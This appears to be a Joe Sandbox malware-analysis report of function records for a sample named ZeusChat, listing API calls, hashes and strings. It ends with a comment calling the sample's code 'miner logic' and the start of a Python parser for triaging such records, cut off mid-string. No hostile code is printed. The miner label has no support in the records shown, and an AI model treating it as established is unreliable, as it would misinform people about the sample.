                                                                                                      • Instruction ID: 24ebfaab909f70674116910ae7fb22107fe1a4c77f149f3be981af54b1adf145
                                                                                                      • Opcode Fuzzy Hash: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                      • Instruction Fuzzy Hash: 06D15A76B06B459AEB10EF61D8801ECB3B5FB44788B844036DE0D57BA9DF78E519C3A0
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,00007FF75200475D,?,?,?,00007FF752008FCF,?,?,?,?,?,?,?,00007FF752009D60), ref: 00007FF752009F34
                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00007FF75200475D,?,?,?,00007FF752008FCF,?,?,?,?,?,?,?,00007FF752009D60), ref: 00007FF75204D886
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      • Opcode ID: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction ID: 6f906ac518c91a2a926c6da2c13a59e32320b4dca173f00bc832cc7901d22ef9
                                                                                                      • Opcode Fuzzy Hash: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction Fuzzy Hash: B0B1D872A0A64686EB61EB15E894339E364FB44F90F894135CA5E43794DF7CE449C360
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1352109105-0
                                                                                                      • Opcode ID: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction ID: dd2eb3395dfffd325a61ca0f2286e9226170a829c7a246e4a6ade1fd99c4aad5
                                                                                                      • Opcode Fuzzy Hash: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction Fuzzy Hash: E0417532A06A4681EB50EF15DC88539B7A0FB44B94FE94136CD1D437A0DFBDE84AC360
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                      • String ID:
                                                                                                      • API String ID: 3076010158-0
                                                                                                      • Opcode ID: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction ID: 8b345f5a2621f3d8514ff07bbbcf893397e20819a493e605b5f4669ba1a579c3
                                                                                                      • Opcode Fuzzy Hash: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction Fuzzy Hash: 4F417C33A05A8196EBA0EF66D8806AD77B0FB54B84F984036CE0D17754CF78E859C760
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 4141327611-0
                                                                                                      • Opcode ID: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction ID: 6054b9a1e493ea5b04817e6ec59a145168d92ea9f76cd8eec88640d96adb50bc
                                                                                                      • Opcode Fuzzy Hash: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction Fuzzy Hash: 2741D77390E64686FB61BE10DA40379E690EFA0BB0FAC5131DA4D866C5DFBCD849C720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                      • String ID:
                                                                                                      • API String ID: 1083639309-0
                                                                                                      • Opcode ID: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction ID: 4702dfa17c963d75b165a2869216e5169a16177ab109ced3ba0e73dcd7acc57d
                                                                                                      • Opcode Fuzzy Hash: b4230e9694d6db5a2454d9ccaa2f058036f57f1eebbf8966ac4aac68c055cdad
                                                                                                      • Instruction Fuzzy Hash: 6F415136A1AA9292E710FB61E8845BEE760FB84B94FD84032EA4D03755DFBCD949C710
                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043C41
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043CA3
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043CDD
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75203A02B,?,?,?,00007FF752039FE6), ref: 00007FF752043D07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1557788787-0
                                                                                                      • Opcode ID: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction ID: 41b4a32dfc448e8d9bcf25184229c202b1467e1d686973259d945f6e2488365f
                                                                                                      • Opcode Fuzzy Hash: 74fb27ec21b7c3bf82c39238e5a02448a96be849278828ef460b116f9bff67e0
                                                                                                      • Instruction Fuzzy Hash: 6B21A231F0979181E624AF15A840029F6A5FB44BD0B9C9134DE8E23BD4DF7CE595C350
                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF752002794: GetWindowLongPtrW.USER32(?,?,00000000,00007FF75204A57D), ref: 00007FF7520027B1
                                                                                                      • GetCursorPos.USER32 ref: 00007FF7520B1861
                                                                                                      • TrackPopupMenuEx.USER32 ref: 00007FF7520B1885
                                                                                                      • GetCursorPos.USER32(?,?,00000000,?,?,00007FF75204A35D,?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520B18CC
                                                                                                      • DefDlgProcW.USER32(?,?,00000000,?,?,00007FF75204A35D,?,?,?,?,?,?,?,?,?,00007FF7520024CF), ref: 00007FF7520B1910
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmp
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2864067406-0
                                                                                                      • Opcode ID: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction ID: 44f4672d04124888f10b81a791d1135be76512ade76eb52677951dd8627c6152
                                                                                                      • Opcode Fuzzy Hash: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                      • Instruction Fuzzy Hash: 73318A36A09A4581EB20EB15E89437DF760F784F94F984132DA4D47BA8DF7CD84AC710
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4127811313-0
                                                                                                      • Opcode ID: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction ID: 32769f223167ebd7b91b8b7e7f1f4b2dc837209d6754027126a9b77800399314
                                                                                                      • Opcode Fuzzy Hash: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                      • Instruction Fuzzy Hash: 46215E32A0964686EA20AB45EC9056EF771FB85B84F984131EA4D43B59CFBCE849C720
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3970641297-0
                                                                                                      • Opcode ID: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction ID: 94b2a365b42922b0c91eba6fe968836502f13d9af18a7757495a80e50aa6c78c
                                                                                                      • Opcode Fuzzy Hash: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                      • Instruction Fuzzy Hash: 0E214176A097C58AE7A49B15E8447AAF7A0FB88784F980135DA8D43B54DFBCD488CB10
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 357397906-0
                                                                                                      • Opcode ID: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction ID: 208c8577584f7846b84131a8f44aa5d0ab4352755b46f285535a6d89013ab9b8
                                                                                                      • Opcode Fuzzy Hash: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                      • Instruction Fuzzy Hash: 7F21F7B6E04741DEEB40DF78D8442AC7BB1F748B48B444866EE1897B18DB78D958CB50
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 1447195878-0
                                                                                                      • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction ID: 7db2c676f529c5ccdb55b59837fa8b39a50a445f280a3652a5d5ca36a688df1b
                                                                                                      • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                      • Instruction Fuzzy Hash: 2A016920F0F30E42EA6977319E6617DD151AFA4798FDC4538D91E027D6EDACA84CC220
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: gfffffff
                                                                                                      • API String ID: 3215553584-1523873471
                                                                                                      • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction ID: 44fa0ce05576ebec6a09b64d5b949a0f3f772fab88dcc061b953838ab13ee463
                                                                                                      • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                      • Instruction Fuzzy Hash: 01917A63B0E38E45EB10AF259A4036CEB95AB35BE0F588131DB8D47395DE7DE109C310
                                                                                                      APIs
                                                                                                      • OleSetContainedObject.OLE32(?,?,?,?,?,?,?,?,?,00007FF7520727FF), ref: 00007FF752072538
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ContainedObject
                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                      • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction ID: 6cafc05579c2ac13d796ceb80c39fc5b3b448951c128cac4cbb0f4c42508b82a
                                                                                                      • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                      • Instruction Fuzzy Hash: BD915832605B4286DB64EF29E8502ADB3A4FB88F94F998036CF8D43724DF79D849C310
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID: e+000$gfff
                                                                                                      • API String ID: 3215553584-3030954782
                                                                                                      • Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                      • Instruction ID: 1d07a4bbb1ef5505b61c81c83b8fe2eea1d1600770015ecc6070d977e0973249
                                                                                                      • Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                      • Instruction Fuzzy Hash: C6516A62B1D7C54AE7249F359E40369AB91EB90B90F8C9231C69C87BC6CF7DD04AC710
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                      • String ID: static
                                                                                                      • API String ID: 3467290483-2160076837
                                                                                                      • Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                      • Instruction ID: 31b54e1fc366b09af3bea8e444df80316897c740132634be497df2f24a16b7fb
                                                                                                      • Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                      • Instruction Fuzzy Hash: 394108325096C286D670AF21E8407AFF7A1FB84790F944235DBAD03A99EF7CD486CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateMessageObjectSendStock
                                                                                                      • String ID: $SysTabControl32
                                                                                                      • API String ID: 2080134422-3143400907
                                                                                                      • Opcode ID: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                      • Instruction ID: 0c0d85046961db2d942585a4c51143f1fb687fd1dbbd3b0c0e657f8e7b7472db
                                                                                                      • Opcode Fuzzy Hash: 4eb597b33270e80a83c3599876bbbd812a4e3a60a25d597e742004689e749718
                                                                                                      • Instruction Fuzzy Hash: 0B317A3251A7C1CAE770DF11A80479AB7A0F7847A0F544335EAA817AD8CB7CD445CF10
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: 1a302059a24ef4730bf8bcb634e8bdb7dbb9c345eed5e02179e57bc52688c5e8
• Instruction ID: f0ce4658c3050796edef6c18bee7b62ddeed351665db332eacb41bfa7c59db67
• Instruction Fuzzy Hash: 1421D722E0DB8AC1EB609B249D90179A661EB55774FAC0335D6AE077D4CF7CD887D310
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: e5c794eae5f48c2ef7f2f6a3d8fc67ccb9001089f9c2a959ce90b06ca3cf1746
• Instruction ID: f543b47160e152046fbbe1f16780d7406a11bf84caf299e6aeb7e23539be5fee
• Instruction Fuzzy Hash: 47314B32A09781CBE364DF29E44075AB7A5F788790F544239EB9D43B98CB78E855CF10
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Combobox
• API String ID: 1025951953-2096851135
• Opcode ID: 419ce087720c7b5737b5b73e28fc957c16fa632f6a553db8683be6f9ef87a6ec
• Instruction ID: f4455cab4e1c4f797aa4c818c00aafc460d241f4b5461390d1312088c86f79f1
• Instruction Fuzzy Hash: FA312A326097C18AE7709F25A840B5AB7A1F7897A0F944235EAAD03B99CB7DD845CF10
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 5492c754c9bff498288acdc113c590e82b98b645c49f858c44027990a109cd19
• Instruction ID: 66224a24802206f6584e00e3abdd6b93df776d802927c348ebbf978da2184e15
• Instruction Fuzzy Hash: 5F313636A09BC18AE770DB15E84475AB7A1F7887A0F944235EAAC43B98CB7CD845CF10
Similarity
• API ID: _handle_error
• String ID: "$pow
• API String ID: 1757819995-713443511
• Opcode ID: 2a5c1d25bf9eaccf3d95b4360943358a5a34a98ae302652ad79e849c14545523
• Instruction ID: 76d247ee4e3fc12ea04853479b5a9515512c7ec7bdbade5fb6affbd6036eb8ac
• Instruction Fuzzy Hash: BC215E72D1CA8887D370DF10E94866AEAA1FBEA344F641326F78906A54CBBDD049DB10
Similarity
• API ID: CloseCreateHandleProcess
• String ID:
• API String ID: 3712363035-3916222277
• Opcode ID: cc2544113331effc305b0a03fe3b3a35c1ebbb01cab2a7be9a8f7d8f60356f9c
• Instruction ID: 6676dace38cb51db5fbe4aaf69b6adea10f801eab790490974cea6670c3d74bb
• Instruction Fuzzy Hash: 4B118231A0978186E714AF12FC4065AF7A5FF84790F8C4136EA4D47A64CFBDD499CB10
Similarity
• API ID: _ctrlfp_handle_error_raise_exc
• String ID: !$tan
• API String ID: 3384550415-2428968949
• Opcode ID: 353651fcbdf869610a9aa7174845b6b37f2108fed80d9f7b1c03092e70d52472
• Instruction ID: 5022e03c795ea1cbbccee9b51fb513c76be5796b5c8daebfe741abd285c59a6f
• Instruction Fuzzy Hash: F5019671E19B8942DA14DF12A84033AE1A1BFDA7D4F945334E99D17B94EF7CD144CB40
Similarity
• API ID: _ctrlfp_handle_error_raise_exc
• String ID: !$sin
• API String ID: 3384550415-1565623160
• Opcode ID: baa30cb22590ecb22bb061425c7c6612d2a3b082cca11217b3942b55bf4d3348
• Instruction ID: 20944e5a1bd4d27dd268f17fc8d4caf043db3e033bacdbbccd0d2503c42ccef7
• Instruction Fuzzy Hash: 0D01D872E19B8942DA14DF12984037AE161BFDA7D4FD08334E95D16B94EFBCD045CB00
Similarity
• API ID: _ctrlfp_handle_error_raise_exc
• String ID: !$cos
• API String ID: 3384550415-1949035351
• Opcode ID: a332118c418a9a5553ba94b25f2e8775fa0e5e0d6883273b594770b1dd192514
• Instruction ID: f9fdc8b94a6d01df01be31c98116013d1179ac6c608e5e83b7ef9122870d70d3
• Instruction Fuzzy Hash: F101D872E19B8942DA14DF129840376E161BFDA7D4FD08324E95D16BD4EFBCD045CB00
                                                                                                      Similarity
                                                                                                      • API ID: _handle_error
                                                                                                      • String ID: "$exp
                                                                                                      • API String ID: 1757819995-2878093337
                                                                                                      • Opcode ID: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction ID: 9a45cf4205244a6946138a01c0dd77fb819914d496844e78651ac40ed843e23d
                                                                                                      • Opcode Fuzzy Hash: ca465fa898a567bf7fb695c7da4f831c21791187771085b507e6f3573d05dac5
                                                                                                      • Instruction Fuzzy Hash: 4C01C836D29B8883E320DF24D4492AAB771FFEA704F645315E74416664CBBDD485DF00
                                                                                                      APIs
                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF752027479
                                                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7520270D1,?,?,?,?,00007FF75202649C,?,?,?,?,00007FF752024B1B), ref: 00007FF752027490
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Valuetry_get_function
                                                                                                      • String ID: FlsSetValue
                                                                                                      • API String ID: 738293619-3750699315
                                                                                                      • Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction ID: 18f7a9067f2e35ad84cd9438c36aff5bc465b88d6fd2cac5c25d1a78fe784fb7
                                                                                                      • Opcode Fuzzy Hash: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
                                                                                                      • Instruction Fuzzy Hash: 46E06565E0A546C2EA246B51FD405BEA261AF48790FCC4032D61D063A5CEBCEC9CC670
                                                                                                      APIs
                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF752025471
                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF752025482
                                                                                                        • Part of subcall function 00007FF752026EA8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF752025487), ref: 00007FF752026F1D
                                                                                                        • Part of subcall function 00007FF752026EA8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF752025487), ref: 00007FF752026F4F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2414919697.00007FF752000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520B5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2414992612.00007FF7520D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EA000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415048265.00007FF7520EE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2415080589.00007FF7520F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_7ff752000000_ZeusChat.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                      • String ID: Unknown exception
                                                                                                      • API String ID: 3561508498-410509341
                                                                                                      • Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction ID: 619156153bfbc1fc13607597de0dc92c18fce4cf1b9bd5d80f0bb3ef1689685f
                                                                                                      • Opcode Fuzzy Hash: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
                                                                                                      • Instruction Fuzzy Hash: 1FD05E22A1AA8A91DF10FB00DCD03A9E330FB80308FD84432D14C815B1DFADDA4EC710
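The function records above all follow one layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and the three shown here are MSVC runtime plumbing rather than miner logic: try_get_function resolving FlsSetValue with TlsSetValue as the statically visible fallback, and std::bad_alloc thrown through _CxxThrowException down to RaiseException. The parser below is an added example, not Joe Sandbox code, that turns such records into dicts and sorts out the runtime noise so an analyst only opens the remaining functions in IDA. Its sample input is a constructed copy of two of the records above trimmed to the lines it reads; the CRT module and shim lists used for classification are this example's heuristic, not a Joe Sandbox rule.

```python
"""Parse Joe Sandbox IDA-plugin function records into dicts and triage CRT noise.
Added example for this page, not Joe Sandbox code. SAMPLE is a constructed copy of
two records in the report's own layout, trimmed to the lines the parser reads."""
import re
from typing import Dict, List

SAMPLE = """\
APIs
• try_get_function.LIBVCRUNTIME ref: 00007FF752027479
• TlsSetValue.KERNEL32(?,?,?,00007FF7520270D1), ref: 00007FF752027490
Strings
Memory Dump Source
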